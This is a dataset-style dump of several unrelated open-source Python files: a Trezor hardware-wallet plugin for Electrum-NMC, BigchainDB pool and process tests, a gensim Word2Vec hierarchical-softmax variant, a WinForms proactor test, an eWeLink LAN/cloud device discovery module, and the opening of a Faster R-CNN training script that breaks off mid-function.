source
stringlengths
3
86
python
stringlengths
75
1.04M
trezor.py
from binascii import hexlify, unhexlify import traceback import sys from electrum_nmc.util import bfh, bh2u, versiontuple, UserCancelled from electrum_nmc.bitcoin import (b58_address_to_hash160, xpub_from_pubkey, TYPE_ADDRESS, TYPE_SCRIPT, is_address) from electrum_nmc import constants from electrum_nmc.i18n import _ from electrum_nmc.plugins import BasePlugin, Device from electrum_nmc.transaction import deserialize, Transaction from electrum_nmc.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey, xtype_from_derivation from electrum_nmc.base_wizard import ScriptTypeNotSupported from ..hw_wallet import HW_PluginBase # TREZOR initialization methods TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4) RECOVERY_TYPE_SCRAMBLED_WORDS, RECOVERY_TYPE_MATRIX = range(0, 2) # script "generation" SCRIPT_GEN_LEGACY, SCRIPT_GEN_P2SH_SEGWIT, SCRIPT_GEN_NATIVE_SEGWIT = range(0, 3) class TrezorKeyStore(Hardware_KeyStore): hw_type = 'trezor' device = 'TREZOR' def get_derivation(self): return self.derivation def get_script_gen(self): xtype = xtype_from_derivation(self.derivation) if xtype in ('p2wpkh', 'p2wsh'): return SCRIPT_GEN_NATIVE_SEGWIT elif xtype in ('p2wpkh-p2sh', 'p2wsh-p2sh'): return SCRIPT_GEN_P2SH_SEGWIT else: return SCRIPT_GEN_LEGACY def get_client(self, force_pair=True): return self.plugin.get_client(self, force_pair) def decrypt_message(self, sequence, message, password): raise RuntimeError(_('Encryption and decryption are not implemented by {}').format(self.device)) def sign_message(self, sequence, message, password): client = self.get_client() address_path = self.get_derivation() + "/%d/%d"%sequence address_n = client.expand_path(address_path) msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message) return msg_sig.signature def sign_transaction(self, tx, password): if tx.is_complete(): return # previous transactions used as inputs prev_tx = {} # path of the xpubs that are involved xpub_path = {} for txin in tx.inputs(): pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin) tx_hash = txin['prevout_hash'] if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin): raise Exception(_('Offline signing with {} is not supported for legacy inputs.').format(self.device)) prev_tx[tx_hash] = txin['prev_tx'] for x_pubkey in x_pubkeys: if not is_xpubkey(x_pubkey): continue xpub, s = parse_xpubkey(x_pubkey) if xpub == self.get_master_public_key(): xpub_path[xpub] = self.get_derivation() self.plugin.sign_transaction(self, tx, prev_tx, xpub_path) class TrezorPlugin(HW_PluginBase): # Derived classes provide: # # class-static variables: client_class, firmware_URL, handler_class, # libraries_available, libraries_URL, minimum_firmware, # wallet_class, ckd_public, types firmware_URL = 'https://wallet.trezor.io' libraries_URL = 'https://github.com/trezor/python-trezor' minimum_firmware = (1, 5, 2) keystore_class = TrezorKeyStore minimum_library = (0, 9, 0) SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh') MAX_LABEL_LEN = 32 def __init__(self, parent, config, name): HW_PluginBase.__init__(self, parent, config, name) try: # Minimal test if python-trezor is installed import trezorlib try: library_version = trezorlib.__version__ except AttributeError: # python-trezor only introduced __version__ in 0.9.0 library_version = 'unknown' if library_version == 'unknown' or \ versiontuple(library_version) < self.minimum_library: self.libraries_available_message = ( _("Library version for '{}' is too old.").format(name) + '\nInstalled: {}, Needed: {}' .format(library_version, self.minimum_library)) self.print_stderr(self.libraries_available_message) raise ImportError() self.libraries_available = True except ImportError: self.libraries_available = False return from . import client from . import transport import trezorlib.ckd_public import trezorlib.messages self.client_class = client.TrezorClient self.ckd_public = trezorlib.ckd_public self.types = trezorlib.messages self.DEVICE_IDS = ('TREZOR',) self.transport_handler = transport.TrezorTransport() self.device_manager().register_enumerate_func(self.enumerate) def enumerate(self): devices = self.transport_handler.enumerate_devices() return [Device(d.get_path(), -1, d.get_path(), 'TREZOR', 0) for d in devices] def create_client(self, device, handler): try: self.print_error("connecting to device at", device.path) transport = self.transport_handler.get_transport(device.path) except BaseException as e: self.print_error("cannot connect at", device.path, str(e)) return None if not transport: self.print_error("cannot connect at", device.path) return self.print_error("connected to device at", device.path) client = self.client_class(transport, handler, self) # Try a ping for device sanity try: client.ping('t') except BaseException as e: self.print_error("ping failed", str(e)) return None if not client.atleast_version(*self.minimum_firmware): msg = (_('Outdated {} firmware for device labelled {}. Please ' 'download the updated firmware from {}') .format(self.device, client.label(), self.firmware_URL)) self.print_error(msg) handler.show_error(msg) return None return client def get_client(self, keystore, force_pair=True): devmgr = self.device_manager() handler = keystore.handler with devmgr.hid_lock: client = devmgr.client_for_keystore(self, handler, keystore, force_pair) # returns the client for a given keystore. can use xpub if client: client.used() return client def get_coin_name(self): return "Testnet" if constants.net.TESTNET else "Bitcoin" def initialize_device(self, device_id, wizard, handler): # Initialization method msg = _("Choose how you want to initialize your {}.\n\n" "The first two methods are secure as no secret information " "is entered into your computer.\n\n" "For the last two methods you input secrets on your keyboard " "and upload them to your {}, and so you should " "only do those on a computer you know to be trustworthy " "and free of malware." ).format(self.device, self.device) choices = [ # Must be short as QT doesn't word-wrap radio button text (TIM_NEW, _("Let the device generate a completely new seed randomly")), (TIM_RECOVER, _("Recover from a seed you have previously written down")), (TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")), (TIM_PRIVKEY, _("Upload a master private key")) ] devmgr = self.device_manager() client = devmgr.client_by_id(device_id) model = client.get_trezor_model() def f(method): import threading settings = self.request_trezor_init_settings(wizard, method, model) t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler)) t.setDaemon(True) t.start() wizard.loop.exec_() wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f) def _initialize_device_safe(self, settings, method, device_id, wizard, handler): try: self._initialize_device(settings, method, device_id, wizard, handler) except UserCancelled: pass except BaseException as e: traceback.print_exc(file=sys.stderr) handler.show_error(str(e)) finally: wizard.loop.exit(0) def _initialize_device(self, settings, method, device_id, wizard, handler): item, label, pin_protection, passphrase_protection, recovery_type = settings if method == TIM_RECOVER and recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS: handler.show_error(_( "You will be asked to enter 24 words regardless of your " "seed's actual length. If you enter a word incorrectly or " "misspell it, you cannot change it or go back - you will need " "to start again from the beginning.\n\nSo please enter " "the words carefully!"), blocking=True) language = 'english' devmgr = self.device_manager() client = devmgr.client_by_id(device_id) if method == TIM_NEW: strength = 64 * (item + 2) # 128, 192 or 256 u2f_counter = 0 skip_backup = False client.reset_device(True, strength, passphrase_protection, pin_protection, label, language, u2f_counter, skip_backup) elif method == TIM_RECOVER: word_count = 6 * (item + 2) # 12, 18 or 24 client.step = 0 if recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS: recovery_type_trezor = self.types.RecoveryDeviceType.ScrambledWords else: recovery_type_trezor = self.types.RecoveryDeviceType.Matrix client.recovery_device(word_count, passphrase_protection, pin_protection, label, language, type=recovery_type_trezor) if recovery_type == RECOVERY_TYPE_MATRIX: handler.close_matrix_dialog() elif method == TIM_MNEMONIC: pin = pin_protection # It's the pin, not a boolean client.load_device_by_mnemonic(str(item), pin, passphrase_protection, label, language) else: pin = pin_protection # It's the pin, not a boolean client.load_device_by_xprv(item, pin, passphrase_protection, label, language) def setup_device(self, device_info, wizard, purpose): devmgr = self.device_manager() device_id = device_info.device.id_ client = devmgr.client_by_id(device_id) if client is None: raise Exception(_('Failed to create a client for this device.') + '\n' + _('Make sure it is in the correct state.')) # fixme: we should use: client.handler = wizard client.handler = self.create_handler(wizard) if not device_info.initialized: self.initialize_device(device_id, wizard, client.handler) client.get_xpub('m', 'standard') client.used() def get_xpub(self, device_id, derivation, xtype, wizard): if xtype not in self.SUPPORTED_XTYPES: raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device)) devmgr = self.device_manager() client = devmgr.client_by_id(device_id) client.handler = wizard xpub = client.get_xpub(derivation, xtype) client.used() return xpub def get_trezor_input_script_type(self, script_gen, is_multisig): if script_gen == SCRIPT_GEN_NATIVE_SEGWIT: return self.types.InputScriptType.SPENDWITNESS elif script_gen == SCRIPT_GEN_P2SH_SEGWIT: return self.types.InputScriptType.SPENDP2SHWITNESS else: if is_multisig: return self.types.InputScriptType.SPENDMULTISIG else: return self.types.InputScriptType.SPENDADDRESS def sign_transaction(self, keystore, tx, prev_tx, xpub_path): self.prev_tx = prev_tx self.xpub_path = xpub_path client = self.get_client(keystore) inputs = self.tx_inputs(tx, True, keystore.get_script_gen()) outputs = self.tx_outputs(keystore.get_derivation(), tx, keystore.get_script_gen()) signed_tx = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[1] raw = bh2u(signed_tx) tx.update_signatures(raw) def show_address(self, wallet, address, keystore=None): if keystore is None: keystore = wallet.get_keystore() if not self.show_address_helper(wallet, address, keystore): return client = self.get_client(keystore) if not client.atleast_version(1, 3): keystore.handler.show_error(_("Your device firmware is too old")) return change, index = wallet.get_address_index(address) derivation = keystore.derivation address_path = "%s/%d/%d"%(derivation, change, index) address_n = client.expand_path(address_path) xpubs = wallet.get_master_public_keys() if len(xpubs) == 1: script_gen = keystore.get_script_gen() script_type = self.get_trezor_input_script_type(script_gen, is_multisig=False) client.get_address(self.get_coin_name(), address_n, True, script_type=script_type) else: def f(xpub): node = self.ckd_public.deserialize(xpub) return self.types.HDNodePathType(node=node, address_n=[change, index]) pubkeys = wallet.get_public_keys(address) # sort xpubs using the order of pubkeys sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs))) pubkeys = list(map(f, sorted_xpubs)) multisig = self.types.MultisigRedeemScriptType( pubkeys=pubkeys, signatures=[b''] * wallet.n, m=wallet.m, ) script_gen = keystore.get_script_gen() script_type = self.get_trezor_input_script_type(script_gen, is_multisig=True) client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type) def tx_inputs(self, tx, for_sig=False, script_gen=SCRIPT_GEN_LEGACY): inputs = [] for txin in tx.inputs(): txinputtype = self.types.TxInputType() if txin['type'] == 'coinbase': prev_hash = "\0"*32 prev_index = 0xffffffff # signed int -1 else: if for_sig: x_pubkeys = txin['x_pubkeys'] if len(x_pubkeys) == 1: x_pubkey = x_pubkeys[0] xpub, s = parse_xpubkey(x_pubkey) xpub_n = self.client_class.expand_path(self.xpub_path[xpub]) txinputtype._extend_address_n(xpub_n + s) txinputtype.script_type = self.get_trezor_input_script_type(script_gen, is_multisig=False) else: def f(x_pubkey): if is_xpubkey(x_pubkey): xpub, s = parse_xpubkey(x_pubkey) else: xpub = xpub_from_pubkey(0, bfh(x_pubkey)) s = [] node = self.ckd_public.deserialize(xpub) return self.types.HDNodePathType(node=node, address_n=s) pubkeys = list(map(f, x_pubkeys)) multisig = self.types.MultisigRedeemScriptType( pubkeys=pubkeys, signatures=list(map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures'))), m=txin.get('num_sig'), ) script_type = self.get_trezor_input_script_type(script_gen, is_multisig=True) txinputtype = self.types.TxInputType( script_type=script_type, multisig=multisig ) # find which key is mine for x_pubkey in x_pubkeys: if is_xpubkey(x_pubkey): xpub, s = parse_xpubkey(x_pubkey) if xpub in self.xpub_path: xpub_n = self.client_class.expand_path(self.xpub_path[xpub]) txinputtype._extend_address_n(xpub_n + s) break prev_hash = unhexlify(txin['prevout_hash']) prev_index = txin['prevout_n'] if 'value' in txin: txinputtype.amount = txin['value'] txinputtype.prev_hash = prev_hash txinputtype.prev_index = prev_index if txin.get('scriptSig') is not None: script_sig = bfh(txin['scriptSig']) txinputtype.script_sig = script_sig txinputtype.sequence = txin.get('sequence', 0xffffffff - 1) inputs.append(txinputtype) return inputs def tx_outputs(self, derivation, tx, script_gen=SCRIPT_GEN_LEGACY): def create_output_by_derivation(info): index, xpubs, m = info if len(xpubs) == 1: if script_gen == SCRIPT_GEN_NATIVE_SEGWIT: script_type = self.types.OutputScriptType.PAYTOWITNESS elif script_gen == SCRIPT_GEN_P2SH_SEGWIT: script_type = self.types.OutputScriptType.PAYTOP2SHWITNESS else: script_type = self.types.OutputScriptType.PAYTOADDRESS address_n = self.client_class.expand_path(derivation + "/%d/%d" % index) txoutputtype = self.types.TxOutputType( amount=amount, script_type=script_type, address_n=address_n, ) else: if script_gen == SCRIPT_GEN_NATIVE_SEGWIT: script_type = self.types.OutputScriptType.PAYTOWITNESS elif script_gen == SCRIPT_GEN_P2SH_SEGWIT: script_type = self.types.OutputScriptType.PAYTOP2SHWITNESS else: script_type = self.types.OutputScriptType.PAYTOMULTISIG address_n = self.client_class.expand_path("/%d/%d" % index) nodes = map(self.ckd_public.deserialize, xpubs) pubkeys = [self.types.HDNodePathType(node=node, address_n=address_n) for node in nodes] multisig = self.types.MultisigRedeemScriptType( pubkeys=pubkeys, signatures=[b''] * len(pubkeys), m=m) txoutputtype = self.types.TxOutputType( multisig=multisig, amount=amount, address_n=self.client_class.expand_path(derivation + "/%d/%d" % index), script_type=script_type) return txoutputtype def create_output_by_address(): txoutputtype = self.types.TxOutputType() txoutputtype.amount = amount if _type == TYPE_SCRIPT: txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN txoutputtype.op_return_data = address[2:] elif _type == TYPE_ADDRESS: txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS txoutputtype.address = address return txoutputtype def is_any_output_on_change_branch(): for _type, address, amount in tx.outputs(): info = tx.output_info.get(address) if info is not None: index, xpubs, m = info if index[0] == 1: return True return False outputs = [] has_change = False any_output_on_change_branch = is_any_output_on_change_branch() for _type, address, amount in tx.outputs(): use_create_by_derivation = False info = tx.output_info.get(address) if info is not None and not has_change: index, xpubs, m = info on_change_branch = index[0] == 1 # prioritise hiding outputs on the 'change' branch from user # because no more than one change address allowed # note: ^ restriction can be removed once we require fw # that has https://github.com/trezor/trezor-mcu/pull/306 if on_change_branch == any_output_on_change_branch: use_create_by_derivation = True has_change = True if use_create_by_derivation: txoutputtype = create_output_by_derivation(info) else: txoutputtype = create_output_by_address() outputs.append(txoutputtype) return outputs def electrum_tx_to_txtype(self, tx): t = self.types.TransactionType() if tx is None: # probably for segwit input and we don't need this prev txn return t d = deserialize(tx.raw) t.version = d['version'] t.lock_time = d['lockTime'] inputs = self.tx_inputs(tx) t._extend_inputs(inputs) for vout in d['outputs']: o = t._add_bin_outputs() o.amount = vout['value'] o.script_pubkey = bfh(vout['scriptPubKey']) return t # This function is called from the TREZOR libraries (via tx_api) def get_tx(self, tx_hash): tx = self.prev_tx[tx_hash] return self.electrum_tx_to_txtype(tx)
test_utils.py
# Copyright BigchainDB GmbH and BigchainDB contributors # SPDX-License-Identifier: (Apache-2.0 AND CC-BY-4.0) # Code is Apache-2.0 and docs are CC-BY-4.0 import queue from unittest.mock import patch, call import pytest pytestmark = pytest.mark.tendermint @pytest.fixture def mock_queue(monkeypatch): class MockQueue: items = [] def get(self, timeout=None): try: return self.items.pop() except IndexError: if timeout: raise queue.Empty() raise def put(self, item): self.items.append(item) mockqueue = MockQueue() monkeypatch.setattr('queue.Queue', lambda: mockqueue) return mockqueue def test_empty_pool_is_populated_with_instances(mock_queue): from bigchaindb import utils pool = utils.pool(lambda: 'hello', 4) assert len(mock_queue.items) == 0 with pool() as instance: assert instance == 'hello' assert len(mock_queue.items) == 1 with pool() as instance: assert instance == 'hello' assert len(mock_queue.items) == 2 with pool() as instance: assert instance == 'hello' assert len(mock_queue.items) == 3 with pool() as instance: assert instance == 'hello' assert len(mock_queue.items) == 4 with pool() as instance: assert instance == 'hello' assert len(mock_queue.items) == 4 def test_pool_blocks_if_no_instances_available(mock_queue): from bigchaindb import utils pool = utils.pool(lambda: 'hello', 4) assert len(mock_queue.items) == 0 # We need to manually trigger the `__enter__` method so the context # manager will "hang" and not return the resource to the pool assert pool().__enter__() == 'hello' assert len(mock_queue.items) == 0 assert pool().__enter__() == 'hello' assert len(mock_queue.items) == 0 assert pool().__enter__() == 'hello' assert len(mock_queue.items) == 0 # We need to keep a reference of the last context manager so we can # manually release the resource last = pool() assert last.__enter__() == 'hello' assert len(mock_queue.items) == 0 # This would block using `queue.Queue` but since we mocked it it will # just raise a IndexError because it's trying to pop from an empty list. with pytest.raises(IndexError): assert pool().__enter__() == 'hello' assert len(mock_queue.items) == 0 # Release the last resource last.__exit__(None, None, None) assert len(mock_queue.items) == 1 assert pool().__enter__() == 'hello' assert len(mock_queue.items) == 0 def test_pool_raises_empty_exception_when_timeout(mock_queue): from bigchaindb import utils pool = utils.pool(lambda: 'hello', 1, timeout=1) assert len(mock_queue.items) == 0 with pool() as instance: assert instance == 'hello' assert len(mock_queue.items) == 1 # take the only resource available assert pool().__enter__() == 'hello' with pytest.raises(queue.Empty): with pool() as instance: assert instance == 'hello' @patch('multiprocessing.Process') def test_process_group_instantiates_and_start_processes(mock_process): from bigchaindb.utils import ProcessGroup def noop(): pass concurrency = 10 pg = ProcessGroup(concurrency=concurrency, group='test_group', target=noop) pg.start() mock_process.assert_has_calls([call(group='test_group', target=noop, name=None, args=(), kwargs={}, daemon=None) for i in range(concurrency)], any_order=True) for process in pg.processes: process.start.assert_called_with() def test_lazy_execution(): from bigchaindb.utils import Lazy lz = Lazy() lz.split(',')[1].split(' ').pop(1).strip() result = lz.run('Like humans, cats tend to favor one paw over another') assert result == 'cats' class Cat: def __init__(self, name): self.name = name cat = Cat('Shmui') lz = Lazy() lz.name.upper() result = lz.run(cat) assert result == 'SHMUI' def test_process_set_title(): from uuid import uuid4 from multiprocessing import Queue from setproctitle import getproctitle from bigchaindb.utils import Process queue = Queue() uuid = str(uuid4()) process = Process(target=lambda: queue.put(getproctitle()), name=uuid) process.start() assert queue.get() == uuid
skipgram.py
from __future__ import division # py3 "true division" """ Modified by Yikai Wang """ import logging import sys import os import heapq import copy import numpy as np from timeit import default_timer from copy import deepcopy from collections import defaultdict import threading import itertools try: from queue import Queue, Empty except ImportError: from Queue import Queue, Empty from numpy import exp, log, dot, zeros, outer, random, dtype, float32 as REAL,\ uint32, seterr, array, uint8, vstack, fromstring, sqrt, newaxis,\ ndarray, empty, sum as np_sum, prod, ones, ascontiguousarray from gensim import utils, matutils # utility fnc for pickling, common scipy operations etc from gensim.models import Word2Vec from gensim.models.word2vec import Vocab from six import iteritems, itervalues, string_types from six.moves import xrange from types import GeneratorType import random logger = logging.getLogger(__name__) try: from gensim.models.word2vec_inner import train_batch_sg, train_batch_cbow from gensim.models.word2vec_inner import score_sentence_sg, score_sentence_cbow from gensim.models.word2vec_inner import FAST_VERSION, MAX_WORDS_IN_BATCH except ImportError: # failed... fall back to plain numpy (20-80x slower training than the above) FAST_VERSION = -1 MAX_WORDS_IN_BATCH = 10000 # modified hierarchical softmax model based on Gensim's implementation class Word2Vec_hs_loss(Word2Vec): def __init__(self, sentences=None, **kwargs): self.inner_node_index_map = {} kwargs["hs"] = 1 kwargs["alpha"] = kwargs.get("alpha", 0.025) kwargs["min_alpha"] = kwargs.get("min_alpha", 0.001) kwargs["min_count"] = 0 kwargs["negative"] = 0 kwargs["sample"] = kwargs.get("sample", 1e-3) kwargs["workers"] = kwargs.get("workers", 20) super(self.__class__, self).__init__(sentences, **kwargs) # add a word as the child of current word in the coarser graph def add_word(self, word, parent_word, emb, cur_index): fake_vocab_size = int(1e7) word_index = len(self.vocab) inner_node_index = word_index - 1 parent_index = self.vocab[parent_word].index # add in the left subtree if word != parent_word: self.vocab[word] = Vocab(index=word_index, count=fake_vocab_size-word_index,sample_int=(2**32)) if emb is not None: self.syn0[cur_index] = emb else: self.syn0[cur_index] = self.syn0[parent_index] # the node in the coarsened graph serves as an inner node now self.index2word.append(word) self.vocab[word].code = array(list(self.vocab[parent_word].code) + [0], dtype=uint8) self.vocab[word].point = array(list(self.vocab[parent_word].point) + [inner_node_index], dtype=uint32) self.inner_node_index_map[parent_word] = inner_node_index else: if emb is not None: self.syn0[parent_index] = emb self.vocab[word].code = array(list(self.vocab[word].code) + [1], dtype=uint8) self.vocab[word].point = array(list(self.vocab[word].point) + [self.inner_node_index_map[word]], dtype=uint32) def train(self, sentences, total_words=None, word_count=0, total_examples=None, queue_factor=2, report_delay=0.1): """ Update the model's neural weights from a sequence of sentences (can be a once-only generator stream). For Word2Vec, each sentence must be a list of unicode strings. (Subclasses may accept other examples.) To support linear learning-rate decay from (initial) alpha to min_alpha, either total_examples (count of sentences) or total_words (count of raw words in sentences) should be provided, unless the sentences are the same as those that were used to initially build the vocabulary. """ self.loss = {} if FAST_VERSION < 0: import warnings warnings.warn("C extension not loaded for Word2Vec, training will be slow. " "Install a C compiler and reinstall gensim for fast training.") self.neg_labels = [] if self.negative > 0: # precompute negative labels optimization for pure-python training self.neg_labels = zeros(self.negative + 1) self.neg_labels[0] = 1. logger.info( "training model with %i workers on %i vocabulary and %i features, " "using sg=%s hs=%s sample=%s negative=%s", self.workers, len(self.vocab), self.layer1_size, self.sg, self.hs, self.sample, self.negative) if not self.vocab: raise RuntimeError("you must first build vocabulary before training the model") if not hasattr(self, 'syn0'): raise RuntimeError("you must first finalize vocabulary before training the model") if total_words is None and total_examples is None: if self.corpus_count: total_examples = self.corpus_count logger.info("expecting %i sentences, matching count from corpus used for vocabulary survey", total_examples) else: raise ValueError("you must provide either total_words or total_examples, to enable alpha and progress calculations") job_tally = 0 if self.iter > 1: sentences = utils.RepeatCorpusNTimes(sentences, self.iter) total_words = total_words and total_words * self.iter total_examples = total_examples and total_examples * self.iter def worker_loop(): """Train the model, lifting lists of sentences from the job_queue.""" work = matutils.zeros_aligned(self.layer1_size, dtype=REAL) # per-thread private work memory neu1 = matutils.zeros_aligned(self.layer1_size, dtype=REAL) jobs_processed = 0 while True: job = job_queue.get() if job is None: progress_queue.put(None) break # no more jobs => quit this worker sentences, alpha = job tally, raw_tally = self._do_train_job(sentences, alpha, (work, neu1)) progress_queue.put((len(sentences), tally, raw_tally)) # report back progress jobs_processed += 1 # logger.debug("worker exiting, processed %i jobs", jobs_processed) def job_producer(): """Fill jobs queue using the input `sentences` iterator.""" job_batch, batch_size = [], 0 pushed_words, pushed_examples = 0, 0 next_alpha = self.alpha job_no = 0 for sent_idx, sentence in enumerate(sentences): sentence_length = self._raw_word_count([sentence]) # can we fit this sentence into the existing job batch? if batch_size + sentence_length <= self.batch_words: # yes => add it to the current job job_batch.append(sentence) batch_size += sentence_length else: # no => submit the existing job #logger.debug( # "queueing job #%i (%i words, %i sentences) at alpha %.05f", # job_no, batch_size, len(job_batch), next_alpha) job_no += 1 job_queue.put((job_batch, next_alpha)) # update the learning rate for the next job if self.min_alpha < next_alpha: if total_examples: # examples-based decay pushed_examples += len(job_batch) progress = 1.0 * pushed_examples / total_examples else: # words-based decay pushed_words += self._raw_word_count(job_batch) progress = 1.0 * pushed_words / total_words next_alpha = self.alpha - (self.alpha - self.min_alpha) * progress next_alpha = max(self.min_alpha, next_alpha) # add the sentence that didn't fit as the first item of a new job job_batch, batch_size = [sentence], sentence_length # add the last job too (may be significantly smaller than batch_words) if job_batch: # logger.debug( # "queueing job #%i (%i words, %i sentences) at alpha %.05f", # job_no, batch_size, len(job_batch), next_alpha) job_no += 1 job_queue.put((job_batch, next_alpha)) if job_no == 0 and self.train_count == 0: logger.warning( "train() called with an empty iterator (if not intended, " "be sure to provide a corpus that offers restartable " "iteration = an iterable)." ) # give the workers heads up that they can finish -- no more work! for _ in xrange(self.workers): job_queue.put(None) logger.debug("job loop exiting, total %i jobs", job_no) # buffer ahead only a limited number of jobs.. this is the reason we can't simply use ThreadPool :( job_queue = Queue(maxsize=queue_factor * self.workers) progress_queue = Queue(maxsize=(queue_factor + 1) * self.workers) workers = [threading.Thread(target=worker_loop) for _ in xrange(self.workers)] unfinished_worker_count = len(workers) workers.append(threading.Thread(target=job_producer)) for thread in workers: thread.daemon = True # make interrupting the process with ctrl+c easier thread.start() example_count, trained_word_count, raw_word_count = 0, 0, word_count start, next_report = default_timer() - 0.00001, 1.0 prev_example_count = 0 while unfinished_worker_count > 0: report = progress_queue.get() # blocks if workers too slow if report is None: # a thread reporting that it finished unfinished_worker_count -= 1 # logger.info("worker thread finished; awaiting finish of %i more threads", unfinished_worker_count) continue examples, trained_words, raw_words = report job_tally += 1 # update progress stats example_count += examples trained_word_count += trained_words # only words in vocab & sampled raw_word_count += raw_words # log progress once every report_delay seconds elapsed = default_timer() - start if elapsed >= next_report: next_report = elapsed + report_delay # all done; report the final stats elapsed = default_timer() - start logger.info( "training on %i raw words (%i effective words) took %.1fs, %.0f effective words/s", raw_word_count, trained_word_count, elapsed, trained_word_count / elapsed) if job_tally < 10 * self.workers: logger.warn("under 10 jobs per worker: consider setting a smaller `batch_words' for smoother alpha decay") # check that the input corpus hasn't changed during iteration if total_examples and total_examples != example_count: logger.warn("supplied example count (%i) did not equal expected count (%i)", example_count, total_examples) if total_words and total_words != raw_word_count: logger.warn("supplied raw word count (%i) did not equal expected count (%i)", raw_word_count, total_words) self.train_count += 1 # number of times train() has been called self.total_train_time += elapsed self.clear_sims() return trained_word_count
test_proactor.py
from toga_winforms.libs import proactor, WinForms import unittest import unittest.mock as mock import asyncio from threading import Thread class Counter(object): def __init__(self): self.count = 0 def increment(self): self.count += 1 class TestProactor(unittest.TestCase): def setUp(self): self.loop = proactor.WinformsProactorEventLoop() # asyncio.set_event_loop(self.loop) self.app_context = WinForms.ApplicationContext() def test_proactor_loop(self): print("=====================================================================") # c = Counter() # with mock.patch.object(Counter, 'increment', wraps=c.increment) as fake_increment: thread = Thread(target=self.loop.run_forever, args=(self.app_context)) thread.start() # await asyncio.sleep(5) print('Started!') self.loop.call_soon_threadsafe(self.loop.stop) # here print('Requested stop!') thread.join() # self.loop.run_forever(self.app_context) print('Finished!') # print("fake_increment:", fake_increment) # unittest.TestCase.assertGreaterEqual(1, fake_increment.count)
discover.py
import asyncio import re import socket from threading import Thread from typing import Optional from aiohttp import ClientSession from zeroconf import ServiceBrowser, Zeroconf from .devices_repository import CoolkitDevicesRepository from .device import CoolkitDevice from .log import Log from .session import CoolkitSession class CoolkitDevicesDiscovery: @classmethod async def discover(cls) -> bool: devices_endpoint = CoolkitSession.get_api_endpoint_url('api/user/device') async with ClientSession(headers=CoolkitSession.get_auth_headers()) as session: async with session.get(devices_endpoint) as response: data = await response.json() if response.status != 200 or ('error' in data and data['error'] != 0): Log.error('Error while trying to retrieve devices list: ' + str(data['error'])) return False for device_data in data: if not CoolkitDevicesRepository.has_device(device_data['deviceid']): device = CoolkitDevice(device_data) CoolkitDevicesRepository.add_device(device) Log.info('Found cloud device: ' + str(device) + ' -> ' + str(device.api_key)) cls._discover_lan() return True @classmethod def _discover_lan(cls) -> bool: cls.browser = ServiceBrowser(Zeroconf(), CoolkitDevice.SERVICE_TYPE, listener=cls) return True @classmethod async def _discover_in_background(cls) -> None: while True: await cls.discover() await asyncio.sleep(60) @classmethod def _start_daemon(cls) -> None: loop = asyncio.new_event_loop() loop.run_until_complete(cls._discover_in_background()) @classmethod def start_daemon(cls) -> None: worker = Thread(target=cls._start_daemon) worker.setDaemon(True) worker.start() @classmethod def get_device_from_service_name(cls, name: str) -> Optional[CoolkitDevice]: m = re.search(r'^ewelink_(\w+)', name, re.IGNORECASE) if not m: return None device_id = m.group(1) return CoolkitDevicesRepository.get_device(device_id) @classmethod def add_service(cls, zeroconf: Zeroconf, type: str, name: str) -> None: """Add service from service browser""" if type != CoolkitDevice.SERVICE_TYPE: return info = zeroconf.get_service_info(type, name) if info is None: return device_ip = socket.inet_ntoa(info.addresses[0]) device_port = info.port device = cls.get_device_from_service_name(name) if device is not None: Log.info('Found LAN device ' + str(device) + ' -> ' + str(device_ip)) device.ip = device_ip device.port = device_port device.client.set_service_browser(zeroconf, name) device.client.update_service(zeroconf, type, name) @classmethod def remove_service(cls, zeroconf: Zeroconf, type: str, name: str) -> None: device = cls.get_device_from_service_name(name) if device is not None: Log.info('Removed LAN device ' + str(device)) device.ip = None device.port = None
train_faster_rcnn_alt_opt_800.py
#!/usr/bin/env python # -------------------------------------------------------- # Faster R-CNN # Copyright (c) 2015 Microsoft # Licensed under The MIT License [see LICENSE for details] # Written by Ross Girshick # -------------------------------------------------------- """Train a Faster R-CNN network using alternating optimization. This tool implements the alternating optimization algorithm described in our NIPS 2015 paper ("Faster R-CNN: Towards Real-time Object Detection with Region Proposal Networks." Shaoqing Ren, Kaiming He, Ross Girshick, Jian Sun.) """ import _init_paths from fast_rcnn.train import get_training_roidb, train_net from fast_rcnn.config import cfg, cfg_from_file, cfg_from_list, get_output_dir from datasets.factory import get_imdb from rpn.generate import imdb_proposals import argparse import pprint import numpy as np import sys, os import multiprocessing as mp import cPickle import shutil def parse_args(): """ Parse input arguments """ parser = argparse.ArgumentParser(description='Train a Faster R-CNN network') parser.add_argument('--gpu', dest='gpu_id', help='GPU device id to use [0]', default=0, type=int) parser.add_argument('--net_name', dest='net_name', help='network name (e.g., "ZF")', default=None, type=str) parser.add_argument('--weights', dest='pretrained_model', help='initialize with pretrained model weights', default=None, type=str) parser.add_argument('--cfg', dest='cfg_file', help='optional config file', default=None, type=str) parser.add_argument('--imdb', dest='imdb_name', help='dataset to train on', default='voc_2007_trainval', type=str) parser.add_argument('--set', dest='set_cfgs', help='set config keys', default=None, nargs=argparse.REMAINDER) if len(sys.argv) == 1: parser.print_help() sys.exit(1) args = parser.parse_args() return args def get_roidb(imdb_name, rpn_file=None): imdb = get_imdb(imdb_name) print 'Loaded dataset `{:s}` for training'.format(imdb.name) imdb.set_proposal_method(cfg.TRAIN.PROPOSAL_METHOD) print 'Set proposal method: {:s}'.format(cfg.TRAIN.PROPOSAL_METHOD) if rpn_file is not None: imdb.config['rpn_file'] = rpn_file roidb = get_training_roidb(imdb) return roidb, imdb def 